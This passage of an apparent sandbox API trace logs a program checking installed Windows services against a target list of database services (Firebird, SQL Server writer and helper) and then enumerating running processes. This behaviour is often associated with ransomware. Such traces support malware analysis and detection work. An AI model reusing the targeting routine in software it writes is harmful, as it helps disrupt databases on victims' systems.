lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0187.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0187.880] lstrlenW (lpString="EventLog") returned 8 [0187.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0187.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0187.880] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0187.880] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0187.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0187.880] lstrlenW (lpString="EventSystem") returned 11 [0187.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0187.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0187.880] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0187.880] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0187.880] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0187.880] lstrlenW (lpString="FontCache") returned 9 [0187.880] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0187.880] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0187.880] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0187.880] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0187.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0187.881] lstrlenW (lpString="gpsvc") returned 5 [0187.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0187.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0187.881] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0187.881] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0187.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0187.881] lstrlenW (lpString="iphlpsvc") returned 8 [0187.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0187.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0187.881] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0187.881] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0187.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0187.881] lstrlenW (lpString="KeyIso") returned 6 [0187.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0187.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0187.881] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0187.881] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0187.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0187.881] lstrlenW (lpString="LanmanServer") returned 12 [0187.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0187.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0187.881] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0187.881] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0187.881] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0187.881] lstrlenW (lpString="LanmanWorkstation") returned 17 [0187.881] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0187.881] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0187.881] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0187.882] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0187.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0187.882] lstrlenW (lpString="lfsvc") returned 5 [0187.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0187.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0187.882] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0187.882] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0187.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0187.882] lstrlenW (lpString="lmhosts") returned 7 [0187.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0187.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0187.882] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0187.882] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0187.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0187.882] lstrlenW (lpString="LSM") returned 3 [0187.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0187.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0187.882] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0187.882] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0187.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0187.882] lstrlenW (lpString="MpsSvc") returned 6 [0187.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0187.882] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0187.882] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0187.882] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0187.882] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0187.882] lstrlenW (lpString="NcbService") returned 10 [0187.882] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0187.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0187.883] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0187.883] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0187.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0187.883] lstrlenW (lpString="netprofm") returned 8 [0187.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0187.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0187.883] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0187.883] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0187.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0187.883] lstrlenW (lpString="NgcSvc") returned 6 [0187.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0187.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0187.883] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0187.883] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0187.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0187.883] lstrlenW (lpString="NlaSvc") returned 6 [0187.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0187.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0187.883] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0187.883] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0187.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0187.883] lstrlenW (lpString="nsi") returned 3 [0187.883] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0187.883] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0187.883] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0187.883] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0187.883] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0187.883] lstrlenW (lpString="PcaSvc") returned 6 [0187.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0187.884] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0187.884] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0187.884] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0187.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0187.884] lstrlenW (lpString="PlugPlay") returned 8 [0187.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0187.884] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0187.884] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0187.884] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0187.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0187.884] lstrlenW (lpString="Power") returned 5 [0187.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0187.884] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0187.884] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0187.884] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0187.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0187.884] lstrlenW (lpString="ProfSvc") returned 7 [0187.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0187.884] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0187.884] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0187.884] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0187.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0187.884] lstrlenW (lpString="RpcEptMapper") returned 12 [0187.884] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0187.884] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0187.884] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0187.884] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0187.884] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0187.885] lstrlenW (lpString="RpcSs") returned 5 [0187.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0187.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0187.885] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0187.885] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0187.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0187.885] lstrlenW (lpString="SamSs") returned 5 [0187.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0187.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0187.885] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0187.885] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0187.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0187.885] lstrlenW (lpString="Schedule") returned 8 [0187.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0187.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0187.885] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0187.885] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0187.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0187.885] lstrlenW (lpString="SecurityHealthService") returned 21 [0187.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0187.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0187.885] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0187.885] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0187.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0187.885] lstrlenW (lpString="SENS") returned 4 [0187.885] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0187.885] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0187.885] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0187.885] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0187.885] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0187.885] lstrlenW (lpString="ShellHWDetection") returned 16 [0187.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0187.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0187.886] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0187.886] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0187.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0187.886] lstrlenW (lpString="Spooler") returned 7 [0187.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0187.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0187.886] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0187.886] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0187.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0187.886] lstrlenW (lpString="StateRepository") returned 15 [0187.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0187.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0187.886] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0187.886] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0187.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0187.886] lstrlenW (lpString="SysMain") returned 7 [0187.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0187.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0187.886] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0187.886] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0187.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0187.886] lstrlenW (lpString="SystemEventsBroker") returned 18 [0187.886] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0187.886] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0187.886] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0187.886] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0187.886] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0187.887] lstrlenW (lpString="Themes") returned 6 [0187.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0187.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0187.887] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0187.887] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0187.887] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0187.887] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0187.887] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0187.887] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0187.887] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0187.887] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0187.887] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f0 [0187.892] Process32FirstW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.893] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0187.893] lstrlenW (lpString="System") returned 6 [0187.894] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0187.894] lstrlenW (lpString="smss.exe") returned 8 [0187.894] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.895] lstrlenW (lpString="csrss.exe") returned 9 [0187.895] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0187.896] lstrlenW (lpString="wininit.exe") returned 11 [0187.896] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0187.897] lstrlenW (lpString="csrss.exe") returned 9 [0187.897] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0187.897] lstrlenW (lpString="winlogon.exe") returned 12 [0187.898] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0187.898] lstrlenW (lpString="services.exe") returned 12 [0187.898] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0187.899] lstrlenW (lpString="lsass.exe") returned 9 [0187.899] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0187.900] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0187.900] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0187.901] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0187.901] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.901] lstrlenW (lpString="svchost.exe") returned 11 [0187.902] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.902] lstrlenW (lpString="svchost.exe") returned 11 [0187.902] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0187.903] lstrlenW (lpString="dwm.exe") returned 7 [0187.903] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.904] lstrlenW (lpString="svchost.exe") returned 11 [0187.904] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.905] lstrlenW (lpString="svchost.exe") returned 11 [0187.905] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.906] lstrlenW (lpString="svchost.exe") returned 11 [0187.906] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.906] lstrlenW (lpString="svchost.exe") returned 11 [0187.906] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.907] lstrlenW (lpString="svchost.exe") returned 11 [0187.907] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.908] lstrlenW (lpString="svchost.exe") returned 11 [0187.908] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.909] lstrlenW (lpString="svchost.exe") returned 11 [0187.909] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.910] lstrlenW (lpString="svchost.exe") returned 11 [0187.910] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.910] lstrlenW (lpString="svchost.exe") returned 11 [0187.910] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.911] lstrlenW (lpString="svchost.exe") returned 11 [0187.911] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0187.912] lstrlenW (lpString="spoolsv.exe") returned 11 [0187.912] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0187.913] lstrlenW (lpString="svchost.exe") returned 11 [0187.913] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0187.914] lstrlenW (lpString="audiodg.exe") returned 11 [0187.914] Process32NextW (in: hSnapshot=0x2f0, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0187.914] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0187.915] Process32NextW (in: 